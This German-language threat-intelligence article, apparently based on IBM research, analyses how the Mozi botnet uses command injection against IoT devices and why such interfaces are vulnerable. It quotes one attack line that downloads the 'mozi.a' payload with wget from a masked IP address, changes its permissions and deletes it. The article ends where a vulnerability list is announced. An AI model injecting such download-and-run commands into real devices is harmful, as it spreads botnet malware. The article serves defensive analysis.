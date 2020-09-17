Nahezu alle von IBM beobachteten IoT-Targeting-Angriffe versuchten, mithilfe von CMDi-Angriffen einen ersten Zugriff auf das Gerät zu erlangen. Wenn das Zielgerät ein IoT-Gerät war und anfällig für diese Angriffe war, wurde die Nutzlast heruntergeladen und ausgeführt.

CMDi-Angriffe sind aus mehreren Gründen bei IoT-Geräten äußerst beliebt. Erstens enthalten eingebettete IoT-Systeme häufig eine Webschnittstelle und eine Debugging-Schnittstelle, die aus der Firmware-Entwicklung übrig geblieben sind und ausgenutzt werden können. Zweitens können in IoT-Webschnittstellen integrierte PHP-Module ausgenutzt werden, um böswilligen Akteuren die Möglichkeit zur Remote-Ausführung zu geben. Und drittens sind IoT-Schnittstellen nach ihrer Bereitstellung oft anfällig, da Administratoren es versäumen, die Schnittstellen durch Bereinigung erwarteter Remote-Eingaben zu sichern. Dadurch können Bedrohungsakteure Shell-Befehle wie „wget“ eingeben.

Unsere Analyse ergab, dass das Mozi-Botnetz CMDi nutzt, indem es einen „wget“-Shell-Befehl verwendet und anschließend die Berechtigungen ändert, um dem Angreifer die Interaktion mit dem betroffenen System zu ermöglichen. Einige Beispiele:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Wenn der Host für CMDi anfällig war, würde dieser Befehl eine Datei namens „mozi.a“ herunterladen und ausführen. Unsere Analyse dieses speziellen Beispiels zeigt, dass die Datei auf einer Mikroprozessorarchitektur ohne verriegelte Pipeline-Stufen (MIPS) ausgeführt wird. Das ist eine Erweiterung, die von Maschinen mit reduzierter Befehlssatzarchitektur (RISC) verstanden wird, die auf vielen IoT-Geräten weit verbreitet ist. Sobald der Angreifer über das Botnetz vollständigen Zugriff auf das Gerät erlangt hat, kann die Firmware-Ebene geändert und zusätzliche Malware auf dem Gerät installiert werden.

Obwohl dieses Beispiel einen bekannten Vektor zitiert, kann es aus zwei Hauptgründen weiterhin wirksam sein. Erstens ermöglichen neue Schwachstellen eine ständige Aktualisierung der Ausbeutungsversuche über CMDi, und eine langsame Patch-Implementierung kann ausgenutzt werden. Zweitens lässt sich diese Aktivität leicht automatisieren, sodass Bedrohungsakteure schnell und kostengünstig eine große Anzahl von Geräten angreifen können.

Die Infrastruktur der Mozi-Bot-Infrakstruktur scheint hauptsächlich aus China zu stammen und macht 84 % der beobachteten Infrastruktur aus. Diese Tatsache deckt sich mit anderen Open-Source-Untersuchungen zu IoT-Aktivitäten im Jahr 2020.

Nachfolgend eine Liste der Schwachstellen, die IBM beim Mozi-Botnetz beobachtet hat und die dieses auszunutzen versucht: